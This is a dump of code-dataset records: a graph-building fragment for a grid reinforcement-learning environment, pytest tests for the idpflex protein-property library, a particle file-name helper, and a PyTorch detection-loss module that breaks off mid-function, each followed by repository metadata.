self.dict = {}
def get(self,state):
hs=hash(state)
val = self.dict.get(hs,-1)
if val == -1:
val = self.total
self.dict[hs] = val
self.total += 1
return val
def reset(self):
self.__init__()
def get_graph(size):
env = SimpleGRID(grid_size=size,max_time=5000)
input_shape = env.observation_space.shape
min_batch = size**2-size
indexer = Indexer()
W = np.zeros((min_batch,min_batch))
states = np.zeros(min_batch).astype(int)
data = np.zeros((min_batch,)+input_shape)
while indexer.total<min_batch:
done = False
s = env.reset()
#s = s.transpose(2,0,1)#np.expand_dims(s,axis=0)
i = indexer.get(s_to_i(env.get_cat(),size))
states[i] = s_to_i(env.get_cat(),size)
data[states[i]] = s
while not done:
s,r,done = env.step(np.random.randint(4))
#s = np.expand_dims(s,axis=0)
#s = s.transpose(-1,0,1)
j = indexer.get(s_to_i(env.get_cat(),size))
states[j] = s_to_i(env.get_cat(),size)
data[states[j]] = s
W[states[i],states[j]] = W[states[j],states[i]] = 1
if r==1:
print(s_to_i(env.get_cat(),size),indexer.total)
i = j
return data, W
class GraphBuilder(object):
def __init__(self, env, action_set, batch_size):
self.env = env
self.action_set = action_set
self.h = xxhash.xxh64()
self.max_size = batch_size
self.indices = set()
self._total = 0
self.dict = {}
self.states = []
self.prev = 0
self.roll = self.roller()
def submit(self,state, new=False):
hs = self.hash(state)
val = self.dict.get(hs,-1)
if val == -1:
self.states.append(state)
val = self._total
self.dict[hs] = self._total
self._total += 1
if not new:
self.indices.add((self.prev,val))
self.prev = val
def reset(self):
self.indices = set()
self._total = 0
self.dict = {}
self.states = []
self.prev = 0
def roller(self):
done = True
while True:
self.reset()
while not self.full:
if done:
s = self.env.reset()
self.submit(s.copy(), new=done)
done = False
while not done and not self.full:
s,_,done,_ = self.env.step(np.random.choice(self.action_set))
self.submit(s.copy())
S,W = self.get_graph()
W = W.toarray()
#W = (W+W.T)/2
W = np.maximum(W,W.T)
#np.fill_diagonal(W, 1)
yield S, W
def get(self):
return self.roll.__next__()
def hash(self,x):
self.h.reset()
self.h.update(x)
return self.h.digest()
def get_graph(self):
if not self.full:
raise "Graph not full Yet"
indices = np.array(list(self.indices))
rows = indices[:,0]
cols = indices[:,1]
data = np.ones(len(rows))
return np.array(self.states),SP.coo_matrix((data, (rows, cols)),shape=(self.max_size, self.max_size))
@property
def size(self):
return self._total
@property
def full(self):
return self.size == self.max_size
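# Minimal usage sketch (env and action_set below are placeholders, not part
# of this module):
#   builder = GraphBuilder(env, action_set=range(4), batch_size=64)
#   S, W = builder.get()  # S: stacked states, W: symmetric 0/1 adjacency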
| 26.732484
| 109
| 0.510841
| 2,850
| 0.679056
| 624
| 0.148678
| 127
| 0.03026
| 0
| 0
| 158
| 0.037646
|
0b710ba6108771869cc4dcfa0e46001cedd35936
| 14,324
|
py
|
Python
|
tests/test_properties.py
|
jmborr/ipdflex
|
9537247c78373f740873703448d948e7a7ada9fb
|
[
"MIT"
] | 3
|
2020-01-15T08:23:48.000Z
|
2022-03-28T22:14:05.000Z
|
tests/test_properties.py
|
jmborr/idpflex
|
9537247c78373f740873703448d948e7a7ada9fb
|
[
"MIT"
] | 46
|
2018-01-10T22:51:46.000Z
|
2021-11-15T17:47:32.000Z
|
tests/test_properties.py
|
jmborr/ipdflex
|
9537247c78373f740873703448d948e7a7ada9fb
|
[
"MIT"
] | 5
|
2018-01-27T15:27:45.000Z
|
2020-01-15T08:23:50.000Z
|
import random
import numpy as np
import pytest
import tempfile
import shutil
from idpflex import properties as ps
from idpflex.properties import SecondaryStructureProperty as SSP
class TestRegisterDecorateProperties(object):
def test_register_as_node_property(self):
class SomeProperty(object):
def __init__(self):
attrs = dict(id='foo', a='ax', b='by', c='ce')
self.__dict__.update(attrs)
associations = (('id', 'name of the property'),
('a', 'this is x'),
('b', 'this is y'),
('c', 'this is e'))
ps.register_as_node_property(SomeProperty, associations)
# Test for class attributes
        assert isinstance(SomeProperty.name, property)
        assert isinstance(SomeProperty.x, property)
        assert isinstance(SomeProperty.y, property)
        assert isinstance(SomeProperty.e, property)
# Test for managed attributes
some_prop = SomeProperty()
assert some_prop.name == 'foo'
assert some_prop.x == 'ax'
assert some_prop.y == 'by'
assert some_prop.e == 'ce'
def test_decorate_as_node_property(self):
associations = (('id', 'name of the property'),
('a', 'this is x'),
('b', 'this is y'),
('c', 'this is e'))
@ps.decorate_as_node_property(associations)
class SomeProperty(object):
def __init__(self):
attrs = dict(id='foo', a='ax', b='by', c='ce')
self.__dict__.update(attrs)
# Test for class attributes
        assert isinstance(SomeProperty.name, property)
        assert isinstance(SomeProperty.x, property)
        assert isinstance(SomeProperty.y, property)
        assert isinstance(SomeProperty.e, property)
# Test for managed attributes
some_prop = SomeProperty()
assert some_prop.name == 'foo'
assert some_prop.x == 'ax'
assert some_prop.y == 'by'
assert some_prop.e == 'ce'
class TestScalarProperty(object):
def test_histogram(self, benchmark):
root_prop = benchmark['tree'].root['sc']
edges, h, e = root_prop.histogram(bins=1, errors=True)
assert h[0] == benchmark['nleafs']
assert e[0] == np.sqrt(h[0])
def test_plot_histogram(self, benchmark):
root_prop = benchmark['tree'].root['sc']
ax = root_prop.plot(kind='histogram', errors=True, bins=1)
assert ax.patches[0]._height == benchmark['nleafs']
class TestAsphericity(object):
def test_from_pdb(self, ss_benchmark):
filename = ss_benchmark['pdb_file']
prop = ps.Asphericity().from_pdb(filename)
np.testing.assert_almost_equal(prop.asphericity, 0.71, decimal=2)
class TestEndToEnd(object):
def test_from_pdb(self, ss_benchmark):
filename = ss_benchmark['pdb_file']
prop = ps.EndToEnd().from_pdb(filename)
np.testing.assert_almost_equal(prop.end_to_end, 9.244, decimal=3)
class TestSaSa(object):
def test_from_pdb(self, ss_benchmark):
filename = ss_benchmark['pdb_file']
prop = ps.SaSa().from_pdb(filename)
np.testing.assert_allclose(prop.sasa, 2964, rtol=0.10)
prop = ps.SaSa().from_pdb(filename, n_sphere_points=3)
np.testing.assert_allclose(prop.sasa, 2989, rtol=0.10)
prop = ps.SaSa().from_pdb(filename, selection='resid 0 to 10')
np.testing.assert_allclose(prop.sasa, 1350, rtol=0.16)
class TestRadiusOfGyration(object):
def test_from_pdb(self, ss_benchmark):
filename = ss_benchmark['pdb_file']
prop = ps.RadiusOfGyration().from_pdb(filename, 'name CA')
np.testing.assert_almost_equal(prop.rg, 8.75, decimal=2)
class TestResidueContactMap(object):
def test_from_universe(self, trajectory_benchmark):
cm = ps.ResidueContactMap().from_universe(trajectory_benchmark,
8, 'name CA')
assert np.sum(cm.y) == 363
cm = ps.ResidueContactMap().from_universe(trajectory_benchmark, 4)
assert np.sum(cm.y) == 313
def test_from_pdb(self, ss_benchmark):
filename = ss_benchmark['pdb_file']
cm = ps.ResidueContactMap().from_pdb(filename, 8, 'name CA')
assert np.sum(cm.y) == 351
@pytest.mark.skip(reason="Plotting not enabled in the CI")
def test_plot(self, trajectory_benchmark):
cm = ps.ResidueContactMap().from_universe(trajectory_benchmark,
8, 'name CA')
cm.plot()
class TestSecondaryStructureProperty(object):
def test_class_decorated_as_node_property(self):
assert isinstance(SSP.name, property)
assert isinstance(SSP.x, property)
assert isinstance(SSP.y, property)
assert isinstance(SSP.e, property)
def test_instance_decorated_as_node_property(self):
ss = 'GTEL'
v = np.random.rand(len(ss), SSP.n_codes)
v /= np.sum(v, axis=1)[:, np.newaxis] # normalize rows
profile_prop = SSP(name='foo', aa=ss, profile=v, errors=0.1*v)
assert profile_prop.name == 'foo'
assert np.array_equal(profile_prop.x, ss)
assert np.array_equal(profile_prop.y, v)
assert np.array_equal(profile_prop.e, 0.1*v)
def test_default_name(self):
ss_prop = SSP()
assert ss_prop.name == 'ss'
def test_from_dssp_sequence(self):
seq = ''.join(random.sample(SSP.dssp_codes, SSP.n_codes))
ss_prop = SSP().from_dssp_sequence(seq)
np.testing.assert_array_equal(ss_prop.y[-1], SSP.code2profile(seq[-1]))
def test_from_dssp(self, ss_benchmark):
name = ss_benchmark['dssp_file']
ss_prop = SSP().from_dssp(name)
np.testing.assert_array_equal(ss_prop.y[-1], SSP.code2profile(' '))
@pytest.mark.skip(reason="DSSP may not be installed in the machine")
def test_from_dssp_pdb(self, ss_benchmark):
name = ss_benchmark['pdb_file']
ss_prop = SSP().from_dssp_pdb(name)
np.testing.assert_array_equal(ss_prop.y[-1], SSP.code2profile(' '))
def test_propagator_size_weighted_sum(self, small_tree):
r"""Create random secondary sequences by shufling all codes and
assign to the leafs of the tree. Then, propagate the profiles up
the tree hiearchy. Finally, compare the profile of the root with
expected profile.
"""
tree = small_tree['tree']
ss_props = list()
for i in range(tree.nleafs):
seq = ''.join(random.sample(SSP.dssp_codes, SSP.n_codes))
ss_props.append(SSP().from_dssp_sequence(seq))
ps.propagator_size_weighted_sum(ss_props, tree)
# Manually calculate the average profile for the last residue
y = np.asarray([ss_props[i].y for i in range(tree.nleafs)])
average_profile = np.mean(y, axis=0)
np.testing.assert_array_almost_equal(average_profile,
tree.root['ss'].y, decimal=12)
def test_fractions(self):
profile = np.random.rand(42, SSP.n_codes) # not normalized
prop = SSP(profile=profile)
f = prop.fractions
assert f['H'] == np.sum(profile, axis=0)[0] / 42
def test_collapse(self):
profile = np.random.rand(42, SSP.n_codes) # not normalized
prop = SSP(profile=profile)
c = prop.collapsed
assert c[0] == np.argmax(profile[0])
def test_disparity(self):
p = np.random.rand(42, SSP.n_codes) # not normalized
o = np.zeros((42, SSP.n_codes))
pr = SSP(profile=p)
assert pr.disparity(SSP(profile=-p)) == 4 * \
pr.disparity(SSP(profile=o))
@pytest.mark.skip(reason="Plotting not enabled in the CI")
def test_plot_percents(self):
profile = np.random.rand(42, SSP.n_codes) # not normalized
profile /= np.sum(profile, axis=1)[:, np.newaxis] # normalized
prop = SSP(profile=profile)
prop.plot('percents')
@pytest.mark.skip(reason="Plotting not enabled in the CI")
def test_plot_node(self):
profile = np.random.rand(42, SSP.n_codes) # not normalized
profile /= np.sum(profile, axis=1)[:, np.newaxis] # normalized
prop = SSP(profile=profile)
prop.plot('node')
@pytest.mark.skip(reason="Plotting not enabled in the CI")
def test_plot_leafs(self, small_tree):
tree = small_tree['tree']
ss_props = list()
for i in range(tree.nleafs):
seq = ''.join(random.sample(1000*SSP.dssp_codes, 42))
ss_props.append(SSP().from_dssp_sequence(seq))
ps.propagator_size_weighted_sum(ss_props, tree)
tree.root['ss'].plot('leafs')
class TestProfileProperty(object):
def test_class_decorated_as_node_property(self):
assert isinstance(ps.ProfileProperty.name, property)
assert isinstance(ps.ProfileProperty.x, property)
assert isinstance(ps.ProfileProperty.y, property)
assert isinstance(ps.ProfileProperty.e, property)
def test_instance_decorated_as_node_property(self):
v = np.arange(9)
profile_prop = ps.ProfileProperty(name='foo', qvalues=v, profile=10*v,
errors=0.1*v)
assert profile_prop.name == 'foo'
assert np.array_equal(profile_prop.x, v)
assert np.array_equal(profile_prop.y, 10*v)
assert np.array_equal(profile_prop.e, 0.1*v)
class TestSansProperty(object):
def test_registered_as_node_property(self):
assert isinstance(ps.SansProperty.name, property)
assert isinstance(ps.SansProperty.x, property)
assert isinstance(ps.SansProperty.y, property)
assert isinstance(ps.SansProperty.e, property)
def test_default_name(self):
sans_prop = ps.SansProperty()
assert sans_prop.name == 'sans'
def test_from_sassena(self, sans_benchmark):
sans_prop = ps.SansProperty()
sans_prop.from_sassena(sans_benchmark['profiles'], index=666)
        assert abs(sans_prop.qvalues[13].item() - 0.0656565651298) < 0.000000001
        assert abs(sans_prop.profile[13].item() - 741970.84461578) < 0.000001
def test_from_cryson_int(self, sans_benchmark):
sans_prop = ps.SansProperty()
sans_prop.from_cryson_int(sans_benchmark['cryson_int'])
assert sans_prop.qvalues[8] == 0.08
assert sans_prop.profile[8] == 0.229457E+06
assert sans_prop.errors[8] == 0.0
@pytest.mark.skipif(shutil.which('cryson') is None, reason='Needs cryson')
def test_from_cryson_pdb(self, sans_benchmark):
sans_prop = ps.SansProperty()
sans_prop.from_cryson_pdb(sans_benchmark['cryson_pdb'], args='')
sans_prop_ref = ps.SansProperty()
sans_prop_ref.from_cryson_int(sans_benchmark['cryson_int'])
np.testing.assert_array_almost_equal(
sans_prop.qvalues, sans_prop_ref.qvalues)
np.testing.assert_array_almost_equal(
sans_prop.profile, sans_prop_ref.profile)
def test_to_and_from_ascii(self, sans_benchmark):
sans_prop_ref = ps.SansProperty()
sans_prop_ref.from_cryson_int(sans_benchmark['cryson_int'])
sans_prop = ps.SansProperty()
with tempfile.NamedTemporaryFile() as f:
sans_prop_ref.to_ascii(f.name)
sans_prop.from_ascii(f.name)
np.testing.assert_array_almost_equal(
sans_prop.qvalues, sans_prop_ref.qvalues)
class TestSaxsProperty(object):
def test_registered_as_node_property(self):
assert isinstance(ps.SaxsProperty.name, property)
assert isinstance(ps.SaxsProperty.x, property)
assert isinstance(ps.SaxsProperty.y, property)
assert isinstance(ps.SaxsProperty.e, property)
def test_default_name(self):
saxs_prop = ps.SaxsProperty()
assert saxs_prop.name == 'saxs'
def test_from_crysol_int(self, saxs_benchmark):
saxs_prop = ps.SaxsProperty()
saxs_prop.from_crysol_int(saxs_benchmark['crysol_file'])
assert saxs_prop.qvalues[8] == 0.008
assert saxs_prop.profile[8] == 1740900.0
assert saxs_prop.errors[8] == 0.0
@pytest.mark.skipif(shutil.which('crysol') is None, reason='Needs crysol')
def test_from_crysol_pdb(self, saxs_benchmark):
saxs_prop = ps.SaxsProperty()
saxs_prop.from_crysol_pdb(saxs_benchmark['crysol_pdb'], args='')
saxs_prop_ref = ps.SaxsProperty()
saxs_prop_ref.from_crysol_int(saxs_benchmark['crysol_int'])
np.testing.assert_array_almost_equal(
saxs_prop.qvalues, saxs_prop_ref.qvalues)
np.testing.assert_array_almost_equal(
saxs_prop.profile, saxs_prop_ref.profile)
def test_to_and_from_ascii(self, saxs_benchmark):
saxs_prop_ref = ps.SaxsProperty()
saxs_prop_ref.from_crysol_int(saxs_benchmark['crysol_int'])
saxs_prop = ps.SaxsProperty()
with tempfile.NamedTemporaryFile() as f:
saxs_prop_ref.to_ascii(f.name)
saxs_prop.from_ascii(f.name)
np.testing.assert_array_almost_equal(
saxs_prop.qvalues, saxs_prop_ref.qvalues)
class TestPropagators(object):
def test_propagator_weighted_sum(self, benchmark):
tree = benchmark['tree']
ps.propagator_weighted_sum(benchmark['simple_property'], tree)
lfs = benchmark['nleafs']
assert tree.root['foo'].bar == int(lfs * (lfs-1) / 2)
def test_propagator_size_weighted_sum(self, sans_benchmark):
tree = sans_benchmark['tree_with_no_property']
values = sans_benchmark['property_list']
ps.propagator_size_weighted_sum(values, tree)
# Test the propagation of the profiles for a node randomly picked
node_id = np.random.randint(tree.nleafs, len(tree)) # exclude leafs
node = tree[node_id]
ln = node.left
rn = node.right
w = float(ln.count) / (ln.count + rn.count)
lnp = ln['sans'] # profile of the "left" sibling node
rnp = rn['sans']
y = w * lnp.y + (1 - w) * rnp.y
assert np.array_equal(y, node['sans'].y)
if __name__ == '__main__':
pytest.main()
| 39.569061
| 79
| 0.645909
| 14,061
| 0.981639
| 0
| 0
| 2,852
| 0.199106
| 0
| 0
| 1,556
| 0.108629
|
0b71623dce279f8394f45396a0c88a69e51e39e7
| 272
|
py
|
Python
|
3d_cnn/src/constants/particles.py
|
mrmattuschka/DeePiCt
|
ef3e81ea25705076f340175d97ccff98f8d11799
|
[
"Apache-2.0"
] | null | null | null |
3d_cnn/src/constants/particles.py
|
mrmattuschka/DeePiCt
|
ef3e81ea25705076f340175d97ccff98f8d11799
|
[
"Apache-2.0"
] | 2
|
2022-03-08T09:22:23.000Z
|
2022-03-20T21:13:07.000Z
|
3d_cnn/src/constants/particles.py
|
ZauggGroup/DeePiCt
|
0bdf1cd845cc306e66e30face1010c12ca3a38d0
|
[
"Apache-2.0"
] | null | null | null |
from os.path import join
def create_particle_file_name(folder_path: str, img_number: int,
coord_indx: int, ext: str) -> str:
file_name = str(img_number) + 'particle' + str(coord_indx) + '.' + ext
return join(folder_path, file_name)
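# e.g. create_particle_file_name('/tmp/out', 4, 7, 'mrc') returns
# '/tmp/out/4particle7.mrc' (illustrative values, not from the source).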
| 34
| 74
| 0.636029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 13
| 0.047794
|
0b72374ff1f0c05184c363dcfc881dd0ee234e7e
| 13,807
|
py
|
Python
|
unn/models/heads/utils/loss.py
|
zongdaoming/TinyTransformer
|
8e64f8816117048c388b4b20e3a56760ce149fe3
|
[
"Apache-2.0"
] | 2
|
2021-08-08T11:23:14.000Z
|
2021-09-16T04:05:23.000Z
|
unn/models/heads/utils/loss.py
|
zongdaoming/TinyTransformer
|
8e64f8816117048c388b4b20e3a56760ce149fe3
|
[
"Apache-2.0"
] | 1
|
2021-08-08T11:25:47.000Z
|
2021-08-08T11:26:15.000Z
|
unn/models/heads/utils/loss.py
|
zongdaoming/TinyTransformer
|
8e64f8816117048c388b4b20e3a56760ce149fe3
|
[
"Apache-2.0"
] | null | null | null |
import logging
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from .... import extensions as E
from . import accuracy as A
logger = logging.getLogger('global')
def _reduce(loss, reduction, **kwargs):
if reduction == 'none':
ret = loss
elif reduction == 'mean':
normalizer = loss.numel()
if kwargs.get('normalizer', None):
normalizer = kwargs['normalizer']
ret = loss.sum() / normalizer
elif reduction == 'sum':
ret = loss.sum()
else:
raise ValueError(reduction + ' is not valid')
return ret
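# Hedged usage sketch of _reduce (names below are illustrative only):
#   loss = torch.abs(pred - target)            # elementwise, shape [N]
#   _reduce(loss, 'none')                      # -> [N], unchanged
#   _reduce(loss, 'sum')                       # -> scalar loss.sum()
#   _reduce(loss, 'mean', normalizer=num_pos)  # -> loss.sum() / num_pos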
def l1_loss(input, target, scale_type='linear', reduction='mean', normalizer=None):
if scale_type == 'linear':
input = input
target = target
elif scale_type == 'log':
input = torch.log(input)
target = torch.log(target)
else:
raise NotImplementedError
loss = torch.abs(input - target)
loss = _reduce(loss, reduction=reduction, normalizer=normalizer)
return loss
def balanced_l1_loss(input, target, sigma=1.0, alpha=0.5, gamma=1.5, reduction='mean', normalizer=None):
beta = 1. / (sigma**2)
diff = torch.abs(input - target)
b = np.e**(gamma / alpha) - 1
loss = torch.where(
diff < beta, alpha / b * (b * diff + 1)
* torch.log(b * diff / beta + 1) - alpha * diff,
gamma * diff + gamma / b - alpha * beta)
loss = _reduce(loss, reduction, normalizer=normalizer)
return loss
def smooth_l1_loss(input, target, sigma, reduce=True, normalizer=1.0):
beta = 1. / (sigma**2)
diff = torch.abs(input - target)
cond = diff < beta
loss = torch.where(cond, 0.5 * diff**2 / beta, diff - 0.5 * beta)
if reduce:
return torch.sum(loss) / normalizer
return torch.sum(loss, dim=1) / normalizer
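# The piecewise form above is the standard smooth-L1 with beta = 1 / sigma**2:
#   0.5 * d**2 / beta   if |d| < beta
#   |d| - 0.5 * beta    otherwise
# e.g. sigma = 1.0 gives beta = 1: quadratic for |d| < 1, linear beyond.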
def cross_entropy_weight(input, target, sample_weight=None, cls_weight=None):
if sample_weight is None:
return F.cross_entropy(input, target, weight=cls_weight)
sample_num = target.size()[0]
log_input = F.log_softmax(input, 1)
loss = F.nll_loss(log_input * sample_weight.reshape(sample_num, 1),
target, cls_weight)
    return loss * sample_num / sample_weight.sum()  # normalize by total sample weight
def ohem_loss(batch_size, cls_pred, cls_target, loc_pred, loc_target, cls_type='softmax', smooth_l1_sigma=1.0):
"""
Arguments:
batch_size (int): number of sampled rois for bbox head training
loc_pred (FloatTensor): [R, 4], location of positive rois
loc_target (FloatTensor): [R, 4], location of positive rois
pos_mask (FloatTensor): [R], binary mask for sampled positive rois
cls_pred (FloatTensor): [R, C]
cls_target (LongTensor): [R]
Returns:
cls_loss, loc_loss (FloatTensor)
"""
if cls_type == 'softmax':
ohem_cls_loss = F.cross_entropy(cls_pred, cls_target, reduction='none', ignore_index=-1)
else:
ohem_cls_loss = F.binary_cross_entropy_with_logits(cls_pred, cls_target, reduction='none')
if loc_pred is None:
ohem_loc_loss = torch.zeros_like(ohem_cls_loss)
else:
ohem_loc_loss = smooth_l1_loss(loc_pred, loc_target, sigma=smooth_l1_sigma, reduce=False)
loss = ohem_cls_loss + ohem_loc_loss
sorted_ohem_loss, idx = torch.sort(loss, descending=True)
keep_num = min(sorted_ohem_loss.size()[0], batch_size)
if keep_num <= sorted_ohem_loss.size()[0]:
keep_idx_cuda = idx[:keep_num]
ohem_cls_loss = ohem_cls_loss[keep_idx_cuda]
ohem_loc_loss = ohem_loc_loss[keep_idx_cuda]
cls_loss = ohem_cls_loss.sum() / keep_num
loc_loss = ohem_loc_loss.sum() / keep_num
return cls_loss, loc_loss, keep_idx_cuda
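# Minimal sketch of the online hard example mining above (shapes illustrative):
#   cls_pred: [R, C] logits, cls_target: [R] labels, batch_size: e.g. 128.
# Per-roi classification and localization losses are summed, sorted in
# descending order, and only the batch_size hardest rois contribute to the
# averaged losses that are returned.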
def get_rpn_cls_loss(cls_pred, cls_target, sample_cls_mask, loss_type):
    """
    Arguments:
        cls_pred (FloatTensor): [B*K, C]
        cls_target (LongTensor): [B*K]
        sample_cls_mask (ByteTensor): [B, K], binary mask for sampled rois
        loss_type (str): sigmoid or softmax
    Returns:
        cls_loss, acc (FloatTensor)
    """
    sample_cls_mask = sample_cls_mask.reshape(-1)
    if loss_type == "softmax":
        cls_pred = cls_pred.reshape(cls_target.numel(), -1)
        cls_target = cls_target.reshape(-1)
        cls_loss = F.cross_entropy(cls_pred, cls_target.long(), ignore_index=-1)
        acc = A.accuracy(cls_pred, cls_target)[0]
    elif loss_type == "sigmoid":
        cls_pred = cls_pred.reshape(-1)
        cls_target = cls_target.reshape(-1)
        normalizer = (sample_cls_mask > 0).float().sum()
        normalizer = max(1, normalizer.item())
        cls_loss = F.binary_cross_entropy_with_logits(cls_pred, cls_target.float(), reduction='none')
        cls_loss = (cls_loss * sample_cls_mask.float()).sum() / normalizer
        # acc = torch.tensor([0]).cuda().float()  # for sigmoid, there is a bug in A.accuracy
        acc = A.binary_accuracy(cls_pred, cls_target)[0]
    return cls_loss, acc
def get_rpn_loc_loss(loc_pred, loc_target, sample_loc_mask, sigma, normalizer):
    """
    Arguments:
        loc_pred (FloatTensor): [B*K, 4]
        loc_target (LongTensor): [B*K, 4]
        sample_loc_mask (ByteTensor): [B, K], binary mask for sampled positive rois
    Returns:
        loc_loss (FloatTensor)
    """
    sample_loc_mask = sample_loc_mask.reshape(-1)
    loc_target = loc_target.reshape(-1, 4)[sample_loc_mask]
    loc_pred = loc_pred.reshape(-1, 4)[sample_loc_mask]
    loc_loss = smooth_l1_loss(loc_pred, loc_target, sigma, normalizer=normalizer)
    return loc_loss
def get_focal_loss(cls_pred, cls_target, normalizer, num_classes, cfg_loss):
    """
    Arguments:
        cls_pred (FloatTensor): [B*K, C]
        cls_target (LongTensor): [B*K]
        cfg_loss: config for focal loss
    Returns:
        cls_loss, acc (FloatTensor)
    """
    alpha = cfg_loss['alpha']
    gamma = cfg_loss['gamma']
    loss_type = cfg_loss['type']
    # the sigmoid variant drops the background channel, hence C = num_classes - 1
    C = {'sigmoid': -1, 'softmax': 0}[loss_type] + num_classes
    cls_pred = cls_pred.float().view(-1, C)
    cls_target = cls_target.int().view(-1)
    normalizer = torch.cuda.FloatTensor([normalizer])
    loss_fn = {'sigmoid': E.SigmoidFocalLossFunction, 'softmax': E.SoftmaxFocalLossFunction}[loss_type]
    loss_fn = loss_fn(gamma, alpha, C)
    cls_loss = loss_fn(cls_pred, cls_target, normalizer)
    if loss_type == 'softmax':
        acc = A.accuracy(cls_pred, cls_target.long())[0]
    elif loss_type == 'sigmoid':
        acc = A.accuracy(cls_pred, cls_target.long() - 1, ignore_indices=[-1, -2])[0]
    else:
        raise NotImplementedError('{} is not supported for focal loss'.format(loss_type))
    return cls_loss, acc
class FocalLoss(nn.Module):
    def __init__(self, class_num, alpha=None, gamma=2, use_alpha=False, size_average=True):
        super(FocalLoss, self).__init__()
        self.class_num = class_num
        self.alpha = alpha
        self.gamma = gamma
        if use_alpha:
            self.alpha = torch.tensor(alpha).cuda()
        self.softmax = nn.Softmax(dim=1)
        self.use_alpha = use_alpha
        self.size_average = size_average

    def forward(self, pred, target):
        prob = self.softmax(pred.view(-1, self.class_num))
        prob = prob.clamp(min=0.0001, max=1.0)
        target_ = torch.zeros(target.size(0), self.class_num).cuda()
        target_.scatter_(1, target.view(-1, 1).long(), 1.)
        if self.use_alpha:
            batch_loss = - self.alpha.double() * torch.pow(1 - prob, self.gamma).double() \
                * prob.log().double() * target_.double()
        else:
            batch_loss = - torch.pow(1 - prob, self.gamma).double() * prob.log().double() * target_.double()
        batch_loss = batch_loss.sum(dim=1)
        if self.size_average:
            loss = batch_loss.mean()
        else:
            loss = batch_loss.sum()
        return loss
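# Background note (not from the original source): the class above implements the
# standard focal loss FL(p_t) = -alpha * (1 - p_t)**gamma * log(p_t) from
# "Focal Loss for Dense Object Detection" (Lin et al.); the one-hot target_
# tensor selects p_t per sample, and the clamp guards against log(0).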
class GHMCLoss(nn.Module):
    def __init__(self, bins=10, momentum=0, loss_weight=1.0):
        super(GHMCLoss, self).__init__()
        self.bins = bins
        self.momentum = momentum
        self.edges = [float(x) / bins for x in range(bins + 1)]
        self.edges[-1] += 1e-6
        self.loss_weight = loss_weight
        if momentum > 0:
            self.acc_sum = [0.0 for _ in range(bins)]

    def binarize_target(self, input, target):
        """ convert target index to one-hot target
        Args:
            input: [B, A, C]
            target: [B, A]
        Returns:
            target: [B, A, C]
            mask: [B, A, C]
        """
        binary_targets = torch.zeros_like(input)
        mask = torch.zeros_like(input)
        pos_inds = target > 0
        cls_inds = target[pos_inds] - 1
        binary_targets[pos_inds, cls_inds] = 1
        mask[target > -1, :] = 1
        return binary_targets, mask
    def forward(self, input, target, mlvl_shapes=None):
        """ Args:
            input [batch_num, anchor_num, C]:
                The direct prediction of classification fc layer.
            target [batch_num, anchor_num]:
                Integer class index per anchor (-1 when the sample is ignored);
                converted to a one-hot binary target by binarize_target above.
        """
        target, mask = self.binarize_target(input, target)
        if mlvl_shapes is None:
            return self.forward_single(input, target, mask)
        mlvl_size = [_[-1] for _ in mlvl_shapes]
        assert input.ndimension() == 3
        assert target.ndimension() == 3
        assert mask.ndimension() == 3
        inputs = input.split(mlvl_size, dim=1)
        targets = target.split(mlvl_size, dim=1)
        masks = mask.split(mlvl_size, dim=1)
        loss = 0
        for i, t, m in zip(inputs, targets, masks):
            loss += self.forward_single(i, t, m)
        return loss
    def forward_single(self, input, target, mask):
        edges = self.edges
        mmt = self.momentum
        weights = torch.zeros_like(input)
        # gradient length
        g = torch.abs(input.sigmoid().detach() - target)
        valid = mask > 0
        tot = max(valid.float().sum().item(), 1.0)
        n = 0  # number of valid (non-empty) bins
        for i in range(self.bins):
            inds = (g >= edges[i]) & (g < edges[i + 1]) & valid
            num_in_bin = inds.sum().item()
            if num_in_bin > 0:
                if mmt > 0:
                    self.acc_sum[i] = mmt * self.acc_sum[i] \
                        + (1 - mmt) * num_in_bin
                    weights[inds] = tot / self.acc_sum[i]
                else:
                    weights[inds] = tot / num_in_bin
                n += 1
        if n > 0:
            weights = weights / n
        loss = F.binary_cross_entropy_with_logits(input, target, weights, reduction='sum') / tot
        return loss * self.loss_weight
    @classmethod
    def from_params(cls, params):
        bins = params['bins']
        momentum = params['momentum']
        loss_weight = params['loss_weight']
        return cls(bins, momentum, loss_weight)
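# Background note (not from the original source): both GHM losses (GHMCLoss
# above, GHMRLoss below) follow "Gradient Harmonized Single-stage Detector"
# (Li et al.): examples are binned by gradient norm g, and each example is
# re-weighted by the inverse density of its bin, so the large mass of easy
# examples (and extreme outliers) no longer dominates the gradient.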
class GHMRLoss(nn.Module):
    def __init__(self, mu=0.02, bins=10, momentum=0, loss_weight=1.0):
        super(GHMRLoss, self).__init__()
        self.mu = mu
        self.bins = bins
        self.edges = [float(x) / bins for x in range(bins + 1)]
        self.edges[-1] = 1e3
        self.momentum = momentum
        self.loss_weight = loss_weight
        if momentum > 0:
            self.acc_sum = [0.0 for _ in range(bins)]
    def forward(self, input, target, mask, mlvl_shapes=None):
        """ Args:
            input [batch_num, anchor_num, 4]:
                The prediction of box regression layer. Channel number can be 4 or
                (4 * class_num) depending on whether it is class-agnostic.
            target [batch_num, anchor_num, 4]:
                The target regression values with the same size of input.
            mask [batch_num, anchor_num]: mask for each anchor
        """
        # expand the per-anchor mask to each coordinate
        mask = mask.float().reshape(input.shape[0], input.shape[1], 1).repeat(1, 1, 4)
        if mlvl_shapes is None:
            return self.forward_single(input, target, mask)
        mlvl_size = [_[-1] for _ in mlvl_shapes]
        assert input.ndimension() == 3
        assert target.ndimension() == 3
        assert mask.ndimension() == 3
        inputs = input.split(mlvl_size, dim=1)
        targets = target.split(mlvl_size, dim=1)
        masks = mask.split(mlvl_size, dim=1)
        loss = 0
        for i, t, m in zip(inputs, targets, masks):
            loss += self.forward_single(i, t, m)
        return loss
    def forward_single(self, input, target, mask):
        mu = self.mu
        edges = self.edges
        mmt = self.momentum
        # ASL1 (authentic smooth L1) loss
        diff = input - target
        loss = torch.sqrt(diff * diff + mu * mu) - mu
        # gradient length
        g = torch.abs(diff / torch.sqrt(mu * mu + diff * diff)).detach()
        weights = torch.zeros_like(g)
        valid = mask > 0
        tot = max(mask.float().sum().item(), 1.0)
        n = 0  # number of valid (non-empty) bins
        for i in range(self.bins):
            inds = (g >= edges[i]) & (g < edges[i + 1]) & valid
            num_in_bin = inds.sum().item()
            if num_in_bin > 0:
                n += 1
                if mmt > 0:
                    self.acc_sum[i] = mmt * self.acc_sum[i] \
                        + (1 - mmt) * num_in_bin
                    weights[inds] = tot / self.acc_sum[i]
                else:
                    weights[inds] = tot / num_in_bin
        if n > 0:
            weights /= n
